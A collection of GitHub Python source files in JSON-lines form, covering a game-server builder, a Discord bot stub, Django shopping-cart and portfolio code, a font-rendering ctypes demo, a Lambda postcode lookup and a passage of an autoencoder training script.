exteriorWorld.doId, exterior.zoneId)\n doorLocatorNode.setBuildingDoorId(exteriorDoor.doId)\n\n zoneId = self.parent.getZoneFromXYZ(doorLocatorNode.getPos())\n self.parent.generateChildWithRequired(doorLocatorNode, zoneId)\n exteriorDoor.setOtherDoor(doorLocatorNode)\n self.addObject(doorLocatorNode)\n\n # update the game area's links\n links = self.parent.getLinks()\n links.append(['', doorLocatorNode.doId, '', self.parent.parentId, self.parent.zoneId, '',\n exteriorWorld.parentId, exteriorWorld.zoneId])\n\n self.parent.b_setLinks(links)\n return doorLocatorNode\n\n def createConnectorLocatorNode(self, parent, parentUid, objKey, objectData):\n locatorName = objectData.get('Name', '')\n if 'interior' not in locatorName:\n return\n\n self.air.worldCreator.locatorManager.addLocator(parentUid, objKey, objectData)\n\n def createCellDoor(self, parent, parentUid, objKey, objectData):\n cellDoor = DistributedCellDoorAI(self.air)\n cellDoor.setUniqueId(objKey)\n cellDoor.setPos(objectData.get('Pos', (0, 0, 0)))\n cellDoor.setHpr(objectData.get('Hpr', (0, 0, 0)))\n cellDoor.setScale(objectData.get('Scale', (1, 1, 1)))\n cellDoor.setCellIndex(objectData.get('Cell Index', 0))\n\n zoneId = self.parent.getZoneFromXYZ(cellDoor.getPos())\n self.parent.generateChildWithRequired(cellDoor, zoneId)\n #self.parentObjectToCell(cellDoor, zoneId)\n\n self.addObject(cellDoor)\n self.parent.addCellDoor(cellDoor)\n return cellDoor\n\n def createParlorTable(self, objectData, parent, parentUid, objKey):\n tableCls = None\n gameType = objectData.get('Category', 'Unknown')\n if gameType == 'Holdem':\n tableCls = DistributedHoldemTableAI\n elif gameType == 'Blackjack':\n tableCls = DistributedBlackjackTableAI\n elif gameType == '7Stud':\n tableCls = Distributed7StudTableAI\n elif gameType == 'Bishops':\n tableCls = DistributedBishopsHandTableAI\n elif gameTable == 'LiarsDice':\n tableCls = DistributedLiarsDiceAI\n else:\n self.notify.warning('Failed to generate Parlor Table %s; %s is not a valid game type' % (objKey, gameType))\n return\n\n gameTable = tableCls(self.air)\n gameTable.setUniqueId(objKey)\n gameTable.setPos(objectData.get('Pos', (0, 0, 0)))\n gameTable.setHpr(objectData.get('Hpr', (0, 0, 0)))\n gameTable.setScale(objectData.get('Scale', 1))\n gameTable.generatePlayers()\n\n if hasattr(gameTable, 'setGameType'):\n gameTable.setGameType(gameType)\n\n if hasattr(gameTable, 'setBetMultiplier'):\n gameTable.setBetMultiplier(int(objectData.get('BetMultiplier', '1')))\n\n zoneId = self.parent.getZoneFromXYZ(gameTable.getPos())\n self.parent.generateChildWithRequired(gameTable, zoneId)\n self.parentObjectToCell(gameTable, zoneId)\n self.addObject(gameTable)\n return gameTable\n","repo_name":"PiratesOnlineClassic/pirates-online-classic","sub_path":"pirates/world/InteriorAreaBuilderAI.py","file_name":"InteriorAreaBuilderAI.py","file_ext":"py","file_size_in_byte":6970,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"} +{"seq_id":"32342279474","text":"\r\n\r\nimport discord\r\nfrom discord.ext import commands\r\n\r\nbot = commands.Bot(command_prefix='!' , intents=discord.Intents.all())\r\n\r\n\r\n@bot.event\r\nasync def on_ready():\r\n print('the bot is online!!')\r\n\r\n\r\n\r\nbot.run(\"your token\")\r\n","repo_name":"ABOONYT/python-tutorial","sub_path":"py/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6581459602","text":"import tkinter as tk\nfrom tkinter import *\nimport config\n\nfrom menu.MenuParameters import MenuParameters\nfrom menu.MenuInputSignal import MenuInputSignal \n\nfrom menu.MenuFirstOrder import MenuFirstOrder\nfrom menu.MenuSecondOrder import MenuSecondOrder\n\nfrom menu.MenuSinewave import MenuSinewave\nfrom menu.MenuSinglePulse import MenuSinglePulse\nfrom menu.MenuPeriodicPulse import MenuPeriodicPulse\n\nmenus = [\n MenuParameters,\n MenuInputSignal\n]\n\nclass MenuMain(tk.Frame):\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n\n self.controller = controller\n self.parent = parent\n\n self.buttonParameters = tk.Button(\n self, width=26, text=\"Parametros\", \n font=config.SMALL_FONT, bg=\"#ffe4c4\", relief=FLAT, \n command=self.buttonParametersPressed)\n\n self.buttonInputSignal = tk.Button(\n self, width=26, text=\"Señal de entrada\",\n font=config.SMALL_FONT, bg=\"#fff0bc\", command=self.buttonInputSignalPressed)\n\n self.buttonParameters.grid( row=0, column=0, ipadx=4, sticky = W)\n self.buttonInputSignal.grid(row=0, column=1, ipadx=4, sticky = E)\n\n self.buttonSimulate = tk.Button(\n self, width=36, text=\"Simular\",\n font=config.SMALL_FONT, background=\"#fff0bc\", command=self.buttonSimulatePressed)\n\n self.buttonSimulate.grid(row=2, column=0, columnspan=3, pady=45, sticky=S)\n\n self.containMenu = tk.Frame(self)\n self.containMenu.grid(row=1, column=0, columnspan=3, sticky=E+W+N+S)\n\n self.menus = {}\n\n for menu in menus:\n self.menus[menu] = menu(self.containMenu, self)\n self.menus[menu].grid_propagate(True)\n self.menus[menu].grid(row=0, column=0, sticky=E+W+N+S)\n self.menus[menu].config(bg=\"#ffe4c4\")\n \n self.showMenu(MenuParameters)\n\n #Menu managing functions\n \n def showMenu(self, menu):\n self.menus[menu].focus()\n menu = self.menus[menu]\n menu.tkraise()\n self.menu = menu\n\n def getCurrentMenu(self):\n return self.menu\n\n #Buttons' callback functions\n \n def buttonParametersPressed(self):\n self.buttonParameters.config( relief=FLAT, bg=\"#ffe4c4\")\n self.buttonInputSignal.config(relief=RAISED, bg=\"#fff0bc\")\n self.showMenu(MenuParameters)\n\n def buttonInputSignalPressed(self):\n self.buttonParameters.config( relief=RAISED, bg=\"#fff0bc\")\n self.buttonInputSignal.config(relief=FLAT, bg=\"#ffe4c4\")\n self.showMenu(MenuInputSignal)\n\n def buttonSimulatePressed(self):\n self.menus[MenuInputSignal].getCurrentSignalMenu().updateSignal()\n self.controller.curveFrame.getCurrentCurve().simulate()\n for menu in menus:\n self.menus[menu].resetButtons()\n\n def focus(self):\n pass","repo_name":"tlondero/TPs-Electro","sub_path":"TP-Final/GUI/menu/MenuMain.py","file_name":"MenuMain.py","file_ext":"py","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10550393107","text":"import ctypes\nfrom ctypes import c_int, c_float, c_void_p, c_short, c_char, byref, string_at\n\n# dlopen\nstb = ctypes.cdll.LoadLibrary(\"./build/libstb.so\")\n\n# Define non-int function return value\nstb.stbtt_ext_AllocFontinfo.restype = c_void_p\nstb.stbtt_ScaleForPixelHeight.restype = c_float\nstb.stbtt_GetGlyphBitmap.restype = c_void_p # raw memory bytes can be accessed via ctypes.string_at\n\n# Define wrapper for automatic malloc/free\nclass Fontinfo:\n def __init__(self):\n self.ptr_fontinfo = stb.stbtt_ext_AllocFontinfo()\n self._as_parameter_ = c_void_p(self.ptr_fontinfo)\n\n def __delete__(self):\n stb.stbtt_ext_FreeFontinfo(self.ptr_fontinfo)\n\n\n#\n# Reimplementation of ex00_font_info.cpp\n#\n\nfontfile = \"/usr/share/fonts/TTF/Roboto-Regular.ttf\"\ncodepoint = b\"J\"\nsize_px = 16\n\n#\n# Initialization\n#\nfont = Fontinfo()\nwith open(fontfile, 'rb') as f:\n fontdata = f.read()\n\nfont_offset = stb.stbtt_GetFontOffsetForIndex(fontdata, 0)\nassert font_offset >= 0\n\nstatus = stb.stbtt_InitFont(font, fontdata, font_offset)\nassert status != 0\n\nglyph_index = stb.stbtt_FindGlyphIndex(font, ord(codepoint));\nassert glyph_index != 0\n\nprint(\"== Codepoint info ==\")\nprint(dict(codepoint=codepoint, glyph_index=glyph_index))\nprint(\"\")\n\n\n#\n# Obtain metrics\n#\nglobal_metrics = dict((name, c_int()) for name in [\n 'ascent', 'descent', 'line_gap', 'x_min', 'y_min', 'x_max', 'y_max'])\nstb.stbtt_GetFontVMetrics(\n font, *[byref(global_metrics[k]) for k in ['ascent', 'descent', 'line_gap']]);\nstb.stbtt_GetFontBoundingBox(\n font, *[byref(global_metrics[k]) for k in ['x_min', 'y_min', 'x_max', 'y_max']]);\n\nglyph_metrics = dict((name, c_int()) for name in [\n 'advance', 'bearing', 'x_min', 'y_min', 'x_max', 'y_max'])\nstb.stbtt_GetGlyphHMetrics(\n font, glyph_index, *[byref(glyph_metrics[k]) for k in ['advance', 'bearing']]);\nstb.stbtt_GetGlyphBox(\n font, glyph_index, *[byref(glyph_metrics[k]) for k in ['x_min', 'y_min', 'x_max', 'y_max']]);\n\nprint(\"== Global metrics ==\")\nprint(dict((k, v.value) for k, v in global_metrics.items()))\nprint(\"\")\n\nprint(\"== Glyph metrics ==\")\nprint(dict((k, v.value) for k, v in glyph_metrics.items()))\nprint(\"\")\n\n#\n# Obtain glyph geometry\n#\nptr_vertices = c_void_p(0)\nnum_vertices = stb.stbtt_GetGlyphShape(font, glyph_index, byref(ptr_vertices));\nassert num_vertices > 0\n\n# Define stbtt_vertex's byte alignment in ctypes\n# TODO: somehow we get \"uninitialized-value\" looking data for `padding`, `cx1`, `cy1`.\nclass Vertex(ctypes.Structure):\n _fields_ = \\\n [(name, c_short) for name in ['x', 'y', 'cx', 'cy', 'cx1', 'cy1']] + \\\n [(name, c_char ) for name in ['type', 'padding']]\n\n type_to_str = [\"NA\", \"move\", \"line\", \"curve\", \"cubic\"]\n\n def to_dict(self):\n result = {}\n result['type'] = Vertex.type_to_str[self.type[0]]\n result['padding'] = self.padding[0]\n for name in ['x', 'y', 'cx', 'cy', 'cx1', 'cy1']:\n result[name] = getattr(self, name)\n return result\n\n# Magical array instantiation\nvertices = (Vertex * num_vertices).from_address(ptr_vertices.value)\n\nprint(\"== Glyph geomerty ==\")\nfor vertex in vertices:\n print(vertex.to_dict())\nprint(\"\")\n\nstb.stbtt_FreeShape(font, ptr_vertices)\n\n\n#\n# Rasterize to bitmap\n#\nscale_y = stb.stbtt_ScaleForPixelHeight(font, c_float(size_px))\nw, h = c_int(), c_int()\nptr_bitmap = stb.stbtt_GetGlyphBitmap(\n font, c_float(0), c_float(scale_y),\n glyph_index, byref(w), byref(h), byref(c_int(0)), byref(c_int(0)))\nbitmap = string_at(ptr_bitmap, size=w.value * h.value)\n\nprint(\"== Rendering ==\")\nfor i in range(h.value):\n for j in range(w.value):\n idx = i * w.value + j\n print(\" .:ioVM@\"[bitmap[idx] >> 5], end='')\n print()\n\nstb.stbtt_FreeBitmap(c_void_p(ptr_bitmap), 0)\n","repo_name":"hi-ogawa/python-shader-app","sub_path":"misc/font/src/ex00_font_info.py","file_name":"ex00_font_info.py","file_ext":"py","file_size_in_byte":3689,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"10060955678","text":"import json\r\nimport requests\r\n\r\n\r\ndef lambda_handler(event, context):\r\n #postcode\r\n postcode = event['rawQueryString']\r\n constituency_url = \"https://api.postcodes.io/postcodes/{}/\".format(postcode)\r\n page = requests.get(constituency_url)\r\n\r\n data = json.loads(page.content)\r\n constituency = data['result']['parliamentary_constituency']\r\n \r\n return {\r\n 'statusCode': 200,\r\n 'headers': {\r\n 'Access-Control-Allow-Headers': 'Content-Type',\r\n 'Access-Control-Allow-Origin': 'http://127.0.0.1:5500',\r\n 'Access-Control-Allow-Methods': 'OPTIONS,POST,GET'\r\n },\r\n 'body' : constituency\r\n }\r\n","repo_name":"muhafara/Python","sub_path":"capstone-project/Python/lambda functions/parliamentary_contituency.py","file_name":"parliamentary_contituency.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"683292975","text":"from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render, redirect\n\nfrom error_and_success import cases\nfrom users.models import Customer\nfrom carts.models import Cart\nfrom carts.models import CartDetails\nfrom orders.models import Order, OrderProduct\nfrom products.models import Product\nfrom django.http import JsonResponse\n\n\n\n# Create your views here.\n@login_required()\ndef add_or_count_cart(request):\n # this function responds to GET and POST requests to the url: /carts\n # it is used to add products to the cart (POST) and to display the size of the cart (GET)\n if request.method == 'POST':\n # If the method is POST we get the user that send the request and the corresponding shopping cart\n # If the cart already contains this product we raise the quantity in the cart by one, otherwise\n # we initialize a cart detail instance that connects the product to the cart\n customer = Customer.objects.filter(user=request.user).first()\n cart = Cart.objects.filter(user=customer.id).first()\n product = Product.objects.get(id=request.POST['product_id'])\n cart_details = CartDetails.objects.filter(cart=cart, product=product)\n if len(cart_details) == 0:\n cart_detail = CartDetails(cart=cart, product=product)\n else:\n cart_detail = cart_details.first()\n cart_detail.quantity += 1\n cart_detail.save()\n return JsonResponse({'count': count_cart(customer, cart)})\n elif request.method == 'GET':\n # If the method is GET we get the user that send the request and the corresponding shopping cart\n # and return the size of the cart\n customer = Customer.objects.filter(user=request.user).first()\n cart = Cart.objects.filter(user=customer.id).first()\n return JsonResponse({'count': count_cart(customer, cart)})\n else:\n return JsonResponse({'error': 'invalid request'})\n\n\n@login_required()\ndef count_cart(customer, cart):\n # this function calculates the size of a cart, looks at every cartdetail\n # and returns the sum of the quantity of each product in the cart\n count = 0\n for cart_detail in CartDetails.objects.filter(cart=cart):\n count += cart_detail.quantity\n return count\n\n@login_required()\ndef view_cart(request):\n # This function takes a request from a registered user and returns a a list\n # of all the products in the user's cart along with the total price.\n customer = Customer.objects.filter(user=request.user).first()\n cart = Cart.objects.filter(user=customer.id).first()\n cart_details = CartDetails.objects.filter(cart=cart)\n products = []\n total = 0\n total_in_cart = 0\n for cart_detail in cart_details:\n product = Product.objects.filter(id=cart_detail.product.id).first()\n total_in_cart += 1\n products.append({'product': product, 'quantity': cart_detail.quantity})\n if product.on_sale == True:\n total += (product.discount_price * cart_detail.quantity)\n else:\n total += (product.price * cart_detail.quantity)\n orders = Order.objects.filter(customer=customer)\n # The user only has one cart and therefore all unconfirmed orders are deleted if\n # the user views his cart again without confirming an order, because if he is in\n # the cart the old order may be invalid and a new is created if he presses checkout\n for order in orders:\n if order.confirmed == False:\n order_products = OrderProduct.objects.filter(order=order)\n for order_product in order_products:\n order_product.delete()\n order.delete()\n\n context1 = {'products': products, 'total_price': round(total,2)}\n context1 = cases.get_profile(context1, request)\n context2 = cases.get_profile(dict(), request)\n\n\n if total_in_cart != 0:\n return render(request, 'carts/cart_details.html', context1)\n else:\n return render(request, 'carts/cart_details_empty.html', context2)\n\n@login_required()\ndef remove_from_cart(request, product_id):\n # This function takes a DELETE request from a registered user and removes the product\n # supplied in the request from the user's cart. If the process is successful, the\n # new total price of the cart is returned\n customer = Customer.objects.filter(user=request.user).first()\n if request.method == 'DELETE':\n cart = Cart.objects.filter(user=customer.id).first()\n product = Product.objects.get(id=product_id)\n cart_detail = CartDetails.objects.filter(cart=cart, product=product).first()\n cart_detail.delete()\n return JsonResponse({'total_price': calc_price(cart)})\n return JsonResponse({'message': 'invalid request'})\n\ndef calc_price(cart):\n # this simple function finds all cart_detail instances connected to a cart\n # and returns the sum of the price of all the products in the cart\n total = 0\n cart_details = CartDetails.objects.filter(cart=cart)\n for cart_detail in cart_details:\n product = Product.objects.filter(id=cart_detail.product.id).first()\n # if the product is on sale, discount price is used\n if product.on_sale == True:\n total += (product.discount_price * cart_detail.quantity)\n else:\n total += (product.price * cart_detail.quantity)\n return round(total,2)\n\n@login_required()\ndef change_quantity(request, product_id):\n # this function takes a request from a registered user and changes the\n # quantity of a given product in the user's cart. The new quantity is\n # provided in the request. Returns the new total price of the cart\n customer = Customer.objects.filter(user=request.user).first()\n if request.method == 'POST':\n cart = Cart.objects.filter(user=customer.id).first()\n product = Product.objects.get(id=product_id)\n cart_detail = CartDetails.objects.filter(cart=cart, product=product).first()\n # if the new amount is 0, remove the product from the cart\n if request.POST['new_amount'] == 0:\n remove_from_cart(request, product_id)\n else:\n cart_detail.quantity = request.POST['new_amount']\n cart_detail.save()\n return JsonResponse({'total_price': calc_price(cart)})\n return JsonResponse({'message': 'invalid request'})","repo_name":"huginngri/CaptainConsole","sub_path":"Captain_Console/carts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16313610510","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"login\", views.login_view, name=\"login\"),\n path(\"logout\", views.logout_view, name=\"logout\"),\n path(\"register\", views.register, name=\"register\"),\n path(\"categories\", views.categories, name=\"categories\"),\n path(\"create\", views.create, name=\"create\"),\n path(\"watchlist\", views.watchlist, name=\"watchlist\"),\n path(\"watchlist/\",\n views.update_watchlist, name=\"update_watchlist\"),\n path(\"category/\", views.category, name=\"category\"),\n path(\"listing/\", views.listing, name=\"listing\"),\n path(\"add_comment/\", views.add_comment, name=\"add_comment\"),\n path(\"bidding/\", views.bidding, name=\"bidding\"),\n path(\"close/\", views.close, name=\"close\"),\n]\n","repo_name":"mikeinnz/cs50web","sub_path":"commerce/auctions/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39034512766","text":"import json\nimport os\nimport os.path\n#Sqlite\nfrom modulos.conexionBD import * #mysqli\n\ndef gravJson():\n\trutOri = []\n\textFotoVid = []\n\ttuplaExtensiones = ()\n\tgestionarBD = gestionBD()\n\tfor elemento in gestionarBD.obtenerDato('RUTAS_ORIGEN','RUTA'):\n\t\tfor elemento2 in elemento:\n\t\t\trutOri.append(elemento2)\n\n\tfor ele_ext in gestionarBD.obtenerDato('OPCIONES_USUARIO','EXT_FOTO_ORIGEN'):\n\t\tfor ele_ext2 in ele_ext:\n\t\t\textFotoVid.append(ele_ext2)\n\t\t\tseparador = \",\"\t\n\t\t\tlistaExt = ele_ext2.split(separador)\t\n\tfor ele_ext in gestionarBD.obtenerDato('OPCIONES_USUARIO','EXT_VID_ORIGEN'):\n\t\tfor ele_ext2 in ele_ext:\n\t\t\textFotoVid.append(ele_ext2)\t\n\t\t\tseparador = \",\"\t\n\t\t\tlistaExt = listaExt + ele_ext2.split(separador)\t\n\ttuplaExtensiones = tuple(listaExt)\n\t#Inicializamos variables\n\tlosFicheros = []\n\tpath=''\n\tdata = {}\n\tdata['ficheros'] = []\n\t#RutaFotosZuriNas = '//xabistation/homes/zuri/Photos/MobileBackup/'\n\t#RutaFotosXabiNas = '//xabistation/homes/xabitsu/Photos/MobileBackup/Galaxy S10 de Xabier/DCIM/Camera'\n\tfor elPath in rutOri:\n\t\tfor root,dirs,files in os.walk(elPath):\n\t\t\tfor file in files:\n\t\t\t\tif file.upper().endswith(tuplaExtensiones):\n\t\t\t\t\tdata['ficheros'].append({\n\t\t\t\t\t\t'nombre': file,\n\t\t\t\t\t\t'ruta': root,\n\t\t\t\t\t\t'extension': os.path.splitext(file)[1]})\n\n\t\twith open('ficherosaTratar.json', 'w') as file:\n\t\t\tjson.dump(data, file, indent=4)\t\n\nif __name__ == '__main__':\n\tgravJson()\t","repo_name":"XabiTobias/movil2pc","sub_path":"modulos/recogerFicheros.py","file_name":"recogerFicheros.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27725650544","text":"# -*- coding: utf-8 -*-\nprint(\"Hola mundo\")\n\"\"\"\nComentario multilínea\n\"\"\"\n\nmi_lista = [\"Johan\", \"Camilo\", \"Mosquera\"]\n# Agrega un elemento a la lista\nmi_lista.append(\"Ninco\")\n# Elimina un elenetos a la lista\nmi_lista.remove(\"Camilo\")\nmi_lista.remove(\"Ninco\")\n\nprint(mi_lista)","repo_name":"jocode/curso-python","sub_path":"listas.py","file_name":"listas.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41487768554","text":"import sqlite3\n\nclass SQL_requestions:\n \"\"\"\n Маленькая либа для sql запросов\n \"\"\"\n def __init__(self,path):\n \"\"\"\n >>> path - путь для взаимодействия с базой данных\n \"\"\"\n connect = sqlite3.connect(path)\n self.cursor = connect.cursor()\n \n def request(self,request_type:str, Table_name:str,Variable:str = None, Condition:str = None, arg:tuple = None):\n \"\"\"\n >>> request_type:str - тип запроса (SELECT, INSERT INTO,..)\n >>> Table_name - имя таблицы для взаимодействия Пример: \"FROM TABLE\"\n >>> Variable - запрашиваемое поле таблицы\n >>> Condition - условие (напр Where)\n >>> *args - некоторые дополонительные аргументы запроса. Вводить через запятую. Напр: Num1, '=', Num2\n\n \"\"\"\n responce_head = f\"{request_type} {Variable} {Table_name} {Condition}\"\n \n if Condition is not None:\n for conditions in arg:\n conditions = str(conditions)\n responce_head = responce_head +' ' + conditions\n print(responce_head)\n try:\n self.resp = self.cursor.execute(responce_head)\n _resp = self.resp.fetchall()\n self.cursor.close()\n return _resp\n except Exception as e:\n print('Ошибка Sql_request: ', e)\n \n\n \n\n \n \n ","repo_name":"MBFROBO/EMCP_conference","sub_path":"lib/sql_browse.py","file_name":"sql_browse.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27324041531","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\nimport bountyomatic.storage\nimport uuid\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Bounty',\n fields=[\n ('id', models.AutoField(auto_created=True, serialize=False, primary_key=True, verbose_name='ID')),\n ('reward', models.TextField(verbose_name='Reward')),\n ('description', models.TextField(verbose_name='Description')),\n ('status', models.PositiveSmallIntegerField(choices=[(1, 'Open'), (2, 'Closed'), (3, 'Cancelled')], default=1, verbose_name='Status')),\n ('region', models.CharField(max_length=2, choices=[('eu', 'Europe'), ('us', 'US')], default='eu', verbose_name='Region')),\n ('added_date', models.DateTimeField(auto_now_add=True, verbose_name='Creation date')),\n ('updated_date', models.DateTimeField(auto_now=True, verbose_name='Latest update')),\n ('is_private', models.BooleanField(default=False, verbose_name='Private')),\n ('comments_closed', models.BooleanField(default=False, verbose_name='Comments closed')),\n ('comments_closed_by_staff', models.BooleanField(default=False, verbose_name='Comments closed by staff')),\n ('is_target_guild', models.BooleanField(default=False, verbose_name='Target guild')),\n ('slug', models.UUIDField(default=uuid.uuid4, unique=True)),\n ('is_hidden', models.BooleanField(default=False, verbose_name='Hidden')),\n ('source_realm', models.CharField(max_length=50, verbose_name='Source realm')),\n ('source_character', models.CharField(max_length=50, verbose_name='Source character')),\n ('destination_realm', models.CharField(max_length=50, verbose_name='Target realm', null=True)),\n ('destination_character', models.CharField(max_length=50, verbose_name='Target name', null=True)),\n ('destination_faction', models.PositiveSmallIntegerField(null=True, choices=[(0, 'Alliance'), (1, 'Horde'), (2, 'Neutral')], verbose_name='Faction')),\n ('winner_realm', models.CharField(max_length=50, blank=True, null=True, verbose_name='Winner realm')),\n ('winner_character', models.CharField(max_length=50, blank=True, null=True, verbose_name='Winner character')),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'ordering': ['-updated_date'],\n 'verbose_name_plural': 'bounties',\n },\n ),\n migrations.CreateModel(\n name='BountyImage',\n fields=[\n ('id', models.AutoField(auto_created=True, serialize=False, primary_key=True, verbose_name='ID')),\n ('updated_date', models.DateTimeField(auto_now=True, db_index=True, verbose_name='Latest update')),\n ('image', models.ImageField(storage=bountyomatic.storage.OverwriteStorage(), upload_to='bounties')),\n ('language', models.CharField(max_length=5, choices=[('en-us', 'English'), ('fr-fr', 'French')])),\n ('bounty', models.ForeignKey(to='bounties.Bounty')),\n ],\n ),\n migrations.CreateModel(\n name='Comment',\n fields=[\n ('id', models.AutoField(auto_created=True, serialize=False, primary_key=True, verbose_name='ID')),\n ('text', models.TextField(verbose_name='Comment')),\n ('character_realm', models.CharField(max_length=50, verbose_name='Character realm')),\n ('character_name', models.CharField(max_length=50, verbose_name='Character name')),\n ('added_date', models.DateTimeField(db_index=True, auto_now_add=True, verbose_name='Creation date')),\n ('updated_date', models.DateTimeField(auto_now=True, db_index=True, verbose_name='Latest update')),\n ('is_hidden', models.BooleanField(default=False, verbose_name='Hidden')),\n ('user_ip', models.GenericIPAddressField(blank=True, unpack_ipv4=True, null=True, verbose_name='IP address')),\n ('bounty', models.ForeignKey(to='bounties.Bounty')),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'ordering': ['-added_date'],\n 'verbose_name_plural': 'comments',\n },\n ),\n migrations.AlterUniqueTogether(\n name='bountyimage',\n unique_together=set([('bounty', 'language')]),\n ),\n migrations.AlterUniqueTogether(\n name='bounty',\n unique_together=set([('user', 'source_realm', 'source_character', 'destination_realm', 'destination_character')]),\n ),\n ]\n","repo_name":"toxinu/bounty-o-matic","sub_path":"bountyomatic/bounties/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":5052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73950055450","text":"from django.urls import path, include\nfrom rest_framework.routers import DefaultRouter\n\nfrom . import views\nfrom .api import BannerViewSet, ProjectViewSet,LogoViewSet\n\nrouter = DefaultRouter()\nrouter.register(r'projects', ProjectViewSet, basename='project')\nrouter.register(r'banners', BannerViewSet, basename='banner')\nrouter.register(r'logos', LogoViewSet, basename='logos')\n\nurlpatterns = [\n path('api/', include(router.urls)),\n\n path('', views.project_list, name='project_list'),\n path('/', views.project_detail, name='project_detail'),\n path('create/', views.project_create, name='project_create'),\n path('/edit/', views.project_edit, name='project_edit'),\n path('delete//', views.project_delete, name='project_delete'),\n path('banner-images/', views.banner_image_list, name='banner_image_list'),\n path('banner-images/upload/', views.upload_banner_image, name='upload_banner_image'),\n path('banner-images/delete//', views.delete_banner_image, name='delete_banner_image'),\n #clients logos:\n path('logo-images/', views.logo_image_list, name='logo_image_list'),\n path('logo-images/upload/', views.upload_logo_images, name='upload_logo_images'),\n path('logo-images/delete//', views.delete_logo_images, name='delete_logo_images')\n\n]\n\n","repo_name":"dee-desu/rpsfinal","sub_path":"portfolio/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22900158990","text":"import datetime\nfrom configs.config import Configuration\nfrom tools.console import Console\nfrom pathlib import Path\nfrom torchvision import transforms\nfrom torch.utils.data import DataLoader\nfrom dataset.uvp_dataset import UvpDataset\nfrom models.classifier_cnn import count_parameters\nfrom models.autoencoder import ConvAutoencoder, ResNetCustom\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom tools.utils import plot_loss, memory_usage\nfrom models.loss import FocalLoss, WeightedCrossEntropyLoss\nfrom tools.augmentation import GaussianNoise\nfrom torchvision.transforms import RandomHorizontalFlip, RandomRotation, RandomAffine\n\n\ndef train_autoencoder(config_path, input_path, output_path):\n\n config = Configuration(config_path, input_path, output_path)\n\n # Create output directory\n input_folder = Path(input_path)\n output_folder = Path(output_path)\n\n console = Console(output_folder)\n console.info(\"Training started ...\")\n\n sampled_images_csv_filename = \"sampled_images.csv\"\n input_csv = input_folder / sampled_images_csv_filename\n\n if not input_csv.is_file():\n console.error(\"The input csv file\", input_csv, \"does not exist.\")\n console.quit(\"Input csv file does not exist.\")\n\n time_str = str(datetime.datetime.now().strftime(\"%Y%m%d%H%M%S\"))\n rel_training_path = Path(\"autoencoder_training\" + time_str)\n training_path = output_folder / rel_training_path\n config.training_path = training_path\n if not training_path.exists():\n training_path.mkdir(exist_ok=True, parents=True)\n elif training_path.exists():\n console.error(\"The output folder\", training_path, \"exists.\")\n console.quit(\"Folder exists, not overwriting previous results.\")\n\n # Save configuration file\n output_config_filename = training_path / \"config.yaml\"\n config.write(output_config_filename)\n\n # Define data transformations\n transform = transforms.Compose([\n transforms.Resize((config.sampling.target_size[0], config.sampling.target_size[1])),\n transforms.ToTensor(),\n ])\n\n # Define data transformations\n transform = transforms.Compose([\n transforms.Resize((config.sampling.target_size[0], config.sampling.target_size[1])),\n RandomHorizontalFlip(),\n RandomRotation(degrees=15),\n RandomAffine(degrees=15, translate=(0.1, 0.1), scale=(0.8, 1.2), shear=15),\n GaussianNoise(std=0.1),\n transforms.ToTensor(),\n ])\n\n # Create uvp dataset datasets for training and validation\n train_dataset = UvpDataset(root_dir=input_folder,\n num_class=config.sampling.num_class,\n csv_file=input_csv,\n transform=transform,\n phase='train')\n\n class_counts = train_dataset.data_frame['label'].value_counts().sort_index().tolist()\n total_samples = sum(class_counts)\n class_weights = [total_samples / (config.sampling.num_class * count) for count in class_counts]\n class_weights_tensor = torch.FloatTensor(class_weights)\n class_weights_tensor = class_weights_tensor / class_weights_tensor.sum()\n\n # Create data loaders\n train_loader = DataLoader(train_dataset,\n batch_size=config.autoencoder.batch_size,\n shuffle=True)\n\n device = torch.device(f'cuda:{config.base.gpu_index}' if\n torch.cuda.is_available() and config.base.cpu is False else 'cpu')\n console.info(f\"Running on: {device}\")\n\n if config.autoencoder.architecture_type == 'conv_autoencoder':\n model = ConvAutoencoder(latent_dim=config.autoencoder.latent_dim,\n input_size=config.sampling.target_size,\n gray=config.autoencoder.gray)\n\n elif config.autoencoder.architecture_type == 